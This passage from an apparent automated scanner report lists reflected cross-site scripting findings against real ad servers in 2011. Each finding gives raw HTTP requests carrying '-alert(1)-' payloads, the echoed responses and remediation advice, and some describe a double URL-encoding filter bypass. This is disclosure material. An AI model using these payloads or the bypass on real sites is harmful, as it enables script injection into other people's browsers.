This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N2724.MSNDPM/B4753684.85;sz=300x250;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00035/101000000000030140.1?!&&PID=7805250&UIT=G431e1'-alert(1)-'5bd123bb5c9&TargetID=30199189&AN=1512704177&PG=NBCNV2&ASID=7fc85c13fabd48efb1f6b2f56b5113f1&destination=;ord=1512704177? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sun, 30 Jan 2011 14:49:51 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6394
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Oct 28 17:44:31 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... <a target=\"_blank\" href=\"http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00035/101000000000030140.1?!&&PID=7805250&UIT=G431e1'-alert(1)-'5bd123bb5c9&TargetID=30199189&AN=1512704177&PG=NBCNV2&ASID=7fc85c13fabd48efb1f6b2f56b5113f1&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/dd/%2a/s%3B231464761%3B0-0%3B0%3B55598777%3B4307-300/250%3B ...[SNIP]...
The value of the destination request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 839ca"-alert(1)-"5a90ece2f0a was submitted in the destination parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N2724.MSNDPM/B4753684.85;sz=300x250;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00035/101000000000030140.1?!&&PID=7805250&UIT=G&TargetID=30199189&AN=1512704177&PG=NBCNV2&ASID=7fc85c13fabd48efb1f6b2f56b5113f1&destination=839ca"-alert(1)-"5a90ece2f0a HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 6210 Cache-Control: no-cache Pragma: no-cache Date: Sun, 30 Jan 2011 14:51:05 GMT Expires: Sun, 30 Jan 2011 14:51:05 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Oct 25 17:27:21 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00035/101000000000030140.1?!&&PID=7805250&UIT=G&TargetID=30199189&AN=1512704177&PG=NBCNV2&ASID=7fc85c13fabd48efb1f6b2f56b5113f1&destination=839ca"-alert(1)-"5a90ece2f0ahttp://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/dd/%2a/m%3B231464693%3B0-0%3B0%3B55598777%3B4307-300/250%3B38973930/38991687/2%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://www.toyota.c ...[SNIP]...
The value of the destination request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 51164'-alert(1)-'9f97bc8ebe8 was submitted in the destination parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N2724.MSNDPM/B4753684.85;sz=300x250;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00035/101000000000030140.1?!&&PID=7805250&UIT=G&TargetID=30199189&AN=1512704177&PG=NBCNV2&ASID=7fc85c13fabd48efb1f6b2f56b5113f1&destination=51164'-alert(1)-'9f97bc8ebe8 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 546 Cache-Control: no-cache Pragma: no-cache Date: Sun, 30 Jan 2011 14:51:09 GMT Expires: Sun, 30 Jan 2011 14:51:09 GMT
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9990f"-alert(1)-"68474f31a2a was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N2724.MSNDPM/B4753684.85;sz=300x250;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00035/101000000000030140.1?!9990f"-alert(1)-"68474f31a2a&&PID=7805250&UIT=G&TargetID=30199189&AN=1512704177&PG=NBCNV2&ASID=7fc85c13fabd48efb1f6b2f56b5113f1&destination=;ord=1512704177? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sun, 30 Jan 2011 14:48:52 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6365
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Oct 28 19:09:32 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 792905/1-11HI_COLORIZER_BACKUP_300x250.jpg"; var minV = 9; var FWH = ' width="300" height="250" '; var url = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00035/101000000000030140.1?!9990f"-alert(1)-"68474f31a2a&&PID=7805250&UIT=G&TargetID=30199189&AN=1512704177&PG=NBCNV2&ASID=7fc85c13fabd48efb1f6b2f56b5113f1&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/dd/%2a/h%3B231983801%3B0-0%3B0%3B5559877 ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5f03d'-alert(1)-'e1b575eb0ff was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N2724.MSNDPM/B4753684.85;sz=300x250;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00035/101000000000030140.1?!5f03d'-alert(1)-'e1b575eb0ff&&PID=7805250&UIT=G&TargetID=30199189&AN=1512704177&PG=NBCNV2&ASID=7fc85c13fabd48efb1f6b2f56b5113f1&destination=;ord=1512704177? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sun, 30 Jan 2011 14:48:58 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6239
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Oct 25 17:25:10 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... <a target=\"_blank\" href=\"http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00035/101000000000030140.1?!5f03d'-alert(1)-'e1b575eb0ff&&PID=7805250&UIT=G&TargetID=30199189&AN=1512704177&PG=NBCNV2&ASID=7fc85c13fabd48efb1f6b2f56b5113f1&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/dd/%2a/x%3B231464651%3B0-0%3B0%3B5559877 ...[SNIP]...
The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d4546'-alert(1)-'157905325f3 was submitted in the &PID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N4492.MSN/B5014254.31;sz=300x60;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003J/28000000000031590.1?!&&PID=8005875d4546'-alert(1)-'157905325f3&UIT=G&TargetID=28253489&AN=423168972&PG=INVPC4&ASID=f5d9a8756fc943da8c2ca677811c16ab&destination=;ord=423168972? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sun, 30 Jan 2011 14:49:07 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 597
The value of the AN request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dc5d7'-alert(1)-'b7357488df1 was submitted in the AN parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N4492.MSN/B5014254.31;sz=300x60;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003J/28000000000031590.1?!&&PID=8005875&UIT=G&TargetID=28253489&AN=423168972dc5d7'-alert(1)-'b7357488df1&PG=INVPC4&ASID=f5d9a8756fc943da8c2ca677811c16ab&destination=;ord=423168972? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sun, 30 Jan 2011 14:50:12 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 597
The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9da96'-alert(1)-'4611c74e57a was submitted in the ASID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N4492.MSN/B5014254.31;sz=300x60;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003J/28000000000031590.1?!&&PID=8005875&UIT=G&TargetID=28253489&AN=423168972&PG=INVPC4&ASID=f5d9a8756fc943da8c2ca677811c16ab9da96'-alert(1)-'4611c74e57a&destination=;ord=423168972? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sun, 30 Jan 2011 14:50:28 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 597
The value of the PG request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 14656'-alert(1)-'cde54af0bc was submitted in the PG parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N4492.MSN/B5014254.31;sz=300x60;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003J/28000000000031590.1?!&&PID=8005875&UIT=G&TargetID=28253489&AN=423168972&PG=INVPC414656'-alert(1)-'cde54af0bc&ASID=f5d9a8756fc943da8c2ca677811c16ab&destination=;ord=423168972? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sun, 30 Jan 2011 14:50:20 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 596
The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 36039'-alert(1)-'7c5b64ad2e1 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N4492.MSN/B5014254.31;sz=300x60;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003J/28000000000031590.1?!&&PID=8005875&UIT=G&TargetID=2825348936039'-alert(1)-'7c5b64ad2e1&AN=423168972&PG=INVPC4&ASID=f5d9a8756fc943da8c2ca677811c16ab&destination=;ord=423168972? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sun, 30 Jan 2011 14:49:49 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 597
The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e1c6'-alert(1)-'e0a8cb864a0 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N4492.MSN/B5014254.31;sz=300x60;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003J/28000000000031590.1?!&&PID=8005875&UIT=G9e1c6'-alert(1)-'e0a8cb864a0&TargetID=28253489&AN=423168972&PG=INVPC4&ASID=f5d9a8756fc943da8c2ca677811c16ab&destination=;ord=423168972? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sun, 30 Jan 2011 14:49:31 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 597
The value of the destination request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d2757'-alert(1)-'bc021de3ac was submitted in the destination parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N4492.MSN/B5014254.31;sz=300x60;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003J/28000000000031590.1?!&&PID=8005875&UIT=G&TargetID=28253489&AN=423168972&PG=INVPC4&ASID=f5d9a8756fc943da8c2ca677811c16ab&destination=d2757'-alert(1)-'bc021de3ac HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 596 Cache-Control: no-cache Pragma: no-cache Date: Sun, 30 Jan 2011 14:50:37 GMT Expires: Sun, 30 Jan 2011 14:50:37 GMT
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 72964'-alert(1)-'300a0130d45 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N4492.MSN/B5014254.31;sz=300x60;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003J/28000000000031590.1?!72964'-alert(1)-'300a0130d45&&PID=8005875&UIT=G&TargetID=28253489&AN=423168972&PG=INVPC4&ASID=f5d9a8756fc943da8c2ca677811c16ab&destination=;ord=423168972? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sun, 30 Jan 2011 14:48:52 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 597
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 482d2%2522%253balert%25281%2529%252f%252f363cbcfa118 was submitted in the REST URL parameter 2. This input was echoed as 482d2";alert(1)//363cbcfa118 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /embed/457d7d7cd3cd82d66ba00fc48f756260482d2%2522%253balert%25281%2529%252f%252f363cbcfa118/45.0.js.300x250/1296350884** HTTP/1.1 Host: ad.wsod.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: u=4d2cdd9abba1d; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; i_1=33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2; c_1=33:967:555:0:0:36941:1294800536:L; o=1:1;
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 02:05:17 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1593
function fpv() { try { var axo = new ActiveXObject('ShockwaveFlash.ShockwaveFlash.6'); try { axo.AllowScriptAccess = 'always'; } catch(e) {return '6,0,0';} } catch(e) {} try { retu ...[SNIP]... <scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260482d2";alert(1)//363cbcfa118/45.0.js.300x250/1296353117**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 117bb%2522%253balert%25281%2529%252f%252f9c0f430c402 was submitted in the REST URL parameter 3. This input was echoed as 117bb";alert(1)//9c0f430c402 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250117bb%2522%253balert%25281%2529%252f%252f9c0f430c402/1296350884** HTTP/1.1 Host: ad.wsod.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: u=4d2cdd9abba1d; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; i_1=33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2; c_1=33:967:555:0:0:36941:1294800536:L; o=1:1;
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 02:05:19 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1593
function fpv() { try { var axo = new ActiveXObject('ShockwaveFlash.ShockwaveFlash.6'); try { axo.AllowScriptAccess = 'always'; } catch(e) {return '6,0,0';} } catch(e) {} try { retu ...[SNIP]... <scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250117bb";alert(1)//9c0f430c402/1296353119**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b7d1e%2522%253balert%25281%2529%252f%252f09059928b was submitted in the REST URL parameter 2. This input was echoed as b7d1e";alert(1)//09059928b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /embed/457d7d7cd3cd82d66ba00fc48f756260b7d1e%2522%253balert%25281%2529%252f%252f09059928b/45.0.js.300x250/Insert_Random_Number?click=Insert_Click_Track_URL HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 01:40:40 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1525
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bf329%2522%253balert%25281%2529%252f%252f8550b302086 was submitted in the REST URL parameter 3. This input was echoed as bf329";alert(1)//8550b302086 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250bf329%2522%253balert%25281%2529%252f%252f8550b302086/Insert_Random_Number?click=Insert_Click_Track_URL HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2
Response
